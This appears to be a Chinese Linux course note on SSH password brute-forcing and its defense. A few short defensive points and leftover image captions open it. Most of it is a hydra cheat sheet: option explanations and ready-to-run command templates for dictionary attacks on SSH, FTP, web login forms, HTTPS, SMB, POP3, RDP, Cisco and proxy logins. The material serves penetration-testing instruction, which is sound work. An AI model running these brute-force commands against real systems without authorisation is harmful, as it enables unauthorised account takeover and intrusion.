千锋Linux教程:35.SSH密码暴力破解及防御实战

Web安全渗透_用户名

暴力穷举  防范
密码 大小写 特殊字符 数字
避免单词

防御 禁止 猜测 尝试密码

Web安全渗透_用户名_02

ssh  ftp  pop3防御

Web安全渗透_用户名_03

在线破解
离线破解 shadow md5等 破解

Web安全渗透_php_04Web安全渗透_用户名_05

Web安全渗透_安全_06

Web安全渗透_用户名_07

Web安全渗透_php_08

删根 操作 0.0
培养他的安全意识
老版本kali root toor

Web安全渗透_安全_09Web安全渗透_php_10

Web安全渗透_php_11

暴力破解:
hydra(九头蛇)
参数:
-R 继续从上一次进度接着破解
-S 大写,采用SSL链接
-s 小写,可通过这个参数指定非默认端口
-l 指定破解的用户,对特定用户破解
-L 指定用户名字典
-p 小写,指定密码破解,少用,一般是采用密码字典
-P 大写,指定密码字典
-e 可选选项,n:空密码试探,s:使用指定用户和密码试探
-C 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数
-M 指定目标列表文件一行一条
-f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解
-t 同时运行的线程数,默认为16
-w 设置最大超时的时间,单位秒,默认是30s
-q 不要打印有关连接错误的消息
-o 指定将结果输出到文件
-v /-V 显示详细过程

各协议的具体命令:
格式+示例:
1、破解ssh:
hydra -L 用户名字典 -p 密码字典 -t 线程 -vV -e ns ip ssh
hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh
2、破解ftp:
hydra ip ftp -L 用户名字典 -P 密码字典 -t 线程(默认16) -vV
hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV
3、get方式提交,破解web登录:
hydra -L 用户名字典 -p 密码字典 -t 线程 -vV -e ns ip http-get/admin/
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get/admin/index.PHP
4、post方式提交,破解web登录:
hydra --L 用户名字典 -P 密码字典 -s 80 ip http-post-form"/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorrypassword"
hydra -t 3 -l admin -P pass.txt -o out.txt -f 192.168.1.1 http-post-form"login.php:id=^USER^&passwd=^PASS^:<title>wrong username orpassword</title>"
参数说明:
-t同时线程数3,-l用户名是admin,字典pass.txt,保存为out.txt,-f 当破解了一个密码就停止,
192.168.1.1目标ip,http-post-form表示破解是采用http的post方式提交的表单密码破解,<title>中的内容是表示错误猜解的返回信息提示
5、破解https:
hydra -m /index.php -l muts -P pass.txt 192.168.1.1 https
6、破解teamspeak:
hydra -L 用户名字典 -P 密码字典 -s 端口号 -vV ip teamspeak
7、破解cisco:
hydra -P pass.txt 192.168.1.1 cisco
hydra -m cloud -P pass.txt 192.168.1.1 cisco-enable
8、破解smb:
hydra -L 用户名字典 -P pass.txt 192.168.1.1 smb
9、破解pop3:
hydra -l muts -P pass.txt my.pop3.mail pop3
10、破解rdp:
hydra ip rdp -l administrator -P pass.txt -V
11、破解http-proxy:
hydra -l admin -P pass.txt http-proxy://192.168.1.1
https://www.jianshu.com/p/998c143ed01d